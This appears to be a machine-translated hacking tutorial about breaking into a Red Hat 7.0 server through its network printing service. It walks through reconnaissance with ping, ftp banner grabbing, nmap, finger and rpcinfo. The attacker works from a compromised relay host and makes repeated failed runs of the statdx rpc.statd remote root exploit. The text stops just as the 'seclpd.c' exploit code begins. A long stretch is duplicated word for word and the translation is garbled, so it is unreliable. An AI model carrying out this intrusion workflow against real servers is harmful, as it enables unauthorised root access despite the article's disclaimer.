The purpose of this article is not to teach people to intrude into Linux servers, but to improve their own technologies and enhance the security awareness of network administrators. That's all! Careless network administrators should understand that a small mistake may cause the entire network to fall! This article focuses on LPD: network printing service attacks
The purpose of this article is not to teach people to intrude into Linux servers, but to improve their own technologies and enhance the security awareness of network administrators. That's all! Careless network administrators should understand that a small mistake may cause the entire network to fall! This article focuses on LPD: network printing service attacks.
First, determine the target, assuming:Www.XXX.com
Let's see if it's connected first:
The following is a reference clip:
C: pingWww.XXX.comPingingWww.XXX.com [202.106.184.200] With 32 bytes of data: Reply from 202.106.184.200: bytes = 32 time = 541 ms TTL = 244 Reply from 202.106.184.200: bytes = 32 time = 620 ms TTL = 244 Reply from 202.106.184.200: bytes = 32 time = 651 ms TTL = 244 Reply from 202.106.184.200: bytes = 32 time = 511 ms TTL = 244 Ping statistics for 202.106.184.200: Packets: Sent = 4, Received = 4, lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 511 ms , Maximum = 651 ms, Average = 580 ms ...... Telnet to see the banner:
C:> telnetWww.XXX.com
The connection to the host is lost.
Try again ftp,
The following is a reference segment: C:> ftpWww.XXX.comConnectedWww.fbi.gov.tw. 220 XXX-www FTP server (Version wu-2.6.1 (1) Wed Aug 9 05:54:50 EDT 2000) ready. User (Www.XXX.com :( none)):
Wu-2.6.1 looks a little eye-catching. This machine is like RedHat7.0! First of all, you must confirm that the stepping stone connecting to Alibaba Cloud:
The following is a reference snippet: C:> telnet xxx. xxx Red Hat Linux release 7.0 (Guinness) Kernel 2.2.16-22smp on an i686 login: fetdog Password: bash-2.04 $
Take the nmap scanner and look at its mysteries ~~~
The following is a reference snippet: bash-2.04 $ nmap-sT-OWww.XXX.comStarting nmap V. 2.54BETA7 (Www.insecure.org/nmap/) WARNING! The following files exist and are readable:/usr/local/sha-services and. /nmap-services. I am choosing/usr/local/share/nmap/s for security reasons. set NMAPDIR =. to give priority to files in irectory Interesting ports on (Www.XXX.com): (The 1520 ports scanned but not shown below are in state: closed) port State Service 25/tcp open smtp 79/tcp open finger 80/tcp open http 111/tcp open sunrpc 113/tcp open auth 443/tcp open https 513/tcp open login 514/ tcp open shell 515/tcp open printer 587/tcp open submission 1024/tcp open kdm TCP Sequence Prediction: class = random positive increments Difficulty = 3247917 (Good luck !) Remote operating system guess: Linux 2.1.122-2.2.16 Nmap run completed -- 1 IP address (1 host up) scanned in 9 seconds
There are many opened ports, which means the possibility of intrusion is increased. 79/tcp open finger. check this vulnerability first, but linux does not have the finger user list vulnerability.
The following is a reference clip:
Bash-2.04 $ finger @ www.XXX.com
[Www.XXX.com]
No one logged on.
Let's take a look at 111/tcp open sunrpc. Rpc vulnerabilities have become popular recently. do you know if RH7 is available? Let's take a look!
The following is a reference clip:
Bash-2.04 $ rpcinfo-pWww.XXX.com
Program vers proto port service
100000 2 tcp 111 rpcbind
100000 2 udp 111 rpcbind
100021 1 udp 1024 nlockmgr
100021 3 udp 1024 nlockmgr
100024 1 udp 1025 status
100024 1 tcp 1024 status
It seems that there is an rpc. statd service. To see if it can remotely overflow to get a rootshell.
The following is a reference clip:
Bash-2.04 $./statdx-h
Statdx by ron1n
Usage: stat [-t] [-p port] [-a addr] [-l len]
[-O offset] [-w num] [-s secs] [-d type]
-T attack a tcp dispatcher [udp]
-P rpc. statd serves requests on [query]
-A stack address of the buffer is
-L the length of the buffer is [1024]
-O the offset to return to is [600]
-W the number of dwords to wipe is [9]
-S set timeout in seconds to [5]
-D use a hardcoded
Available types:
0 RedHat 6.2 (nfs-utils-0.1.6-2)
1 RedHat 6.1 (knfsd-1.4.7-7)
2 RedHat 6.0 (knfsd-1.2.2-4)
It seems that RH7 is not supported. Continue to try again. try all 0-2 again! Start ......
Bash-2.04 $ stat-d 0Www.XXX.com
Buffer: 0xbffff314 length: 999 (+ str/+ nul)
Target: 0xbffff718 new: 0xbffff56c (offset: 600)
Wiping 9 dwords
Failed-statd returned res_stat: (failure) state: 21
Frustrated, try again ......
Bash-2.04 $ stat-d 1Www.XXX.com
Buffer: 0xbffff314 length: 999 (+ str/+ nul)
Target: 0xbffff718 new: 0xbffff56c (offset: 600)
Wiping 9 dwords
Failed-statd returned res_stat: (failure) state: 21
Same ''to continue
The following is a reference clip:
Bash-2.04 $ finger @ www.XXX.com
[Www.XXX.com]
No one logged on.
Let's take a look at 111/tcp open sunrpc. Rpc vulnerabilities have become popular recently. do you know if RH7 is available? Let's take a look!
The following is a reference clip:
Bash-2.04 $ rpcinfo-pWww.XXX.com
Program vers proto port service
100000 2 tcp 111 rpcbind
100000 2 udp 111 rpcbind
100021 1 udp 1024 nlockmgr
100021 3 udp 1024 nlockmgr
100024 1 udp 1025 status
100024 1 tcp 1024 status
It seems that there is an rpc. statd service. To see if it can remotely overflow to get a rootshell.
The following is a reference clip:
Bash-2.04 $./statdx-h
Statdx by ron1n
Usage: stat [-t] [-p port] [-a addr] [-l len]
[-O offset] [-w num] [-s secs] [-d type]
-T attack a tcp dispatcher [udp]
-P rpc. statd serves requests on [query]
-A stack address of the buffer is
-L the length of the buffer is [1024]
-O the offset to return to is [600]
-W the number of dwords to wipe is [9]
-S set timeout in seconds to [5]
-D use a hardcoded
Available types:
0 RedHat 6.2 (nfs-utils-0.1.6-2)
1 RedHat 6.1 (knfsd-1.4.7-7)
2 RedHat 6.0 (knfsd-1.2.2-4)
It seems that RH7 is not supported. Continue to try again. try all 0-2 again! Start ......
Bash-2.04 $ stat-d 0Www.XXX.com
Buffer: 0xbffff314 length: 999 (+ str/+ nul)
Target: 0xbffff718 new: 0xbffff56c (offset: 600)
Wiping 9 dwords
Failed-statd returned res_stat: (failure) state: 21
Frustrated, try again ......
Bash-2.04 $ stat-d 1Www.XXX.com
Buffer: 0xbffff314 length: 999 (+ str/+ nul)
Target: 0xbffff718 new: 0xbffff56c (offset: 600)
Wiping 9 dwords
Failed-statd returned res_stat: (failure) state: 21
Same ''to continue
The following is a reference clip:
Bash-2.04 $ stat-d 1Www.XXX.com
Buffer: 0xbffff314 length: 999 (+ str/+ nul)
Target: 0xbffff718 new: 0xbffff56c (offset: 600)
Wiping 9 dwords
Failed-statd returned res_stat: (failure) state: 21
Rpc. statd does not work. think about the remote overflow of RH7, as if it was caused by the lp service. "Seclpd. c" should be this stuff.
----- The following code is for teaching purposes only and cannot be used for malicious attacks -----
The following is a reference clip:
/*
* WelcomeHttp://hlc.cnro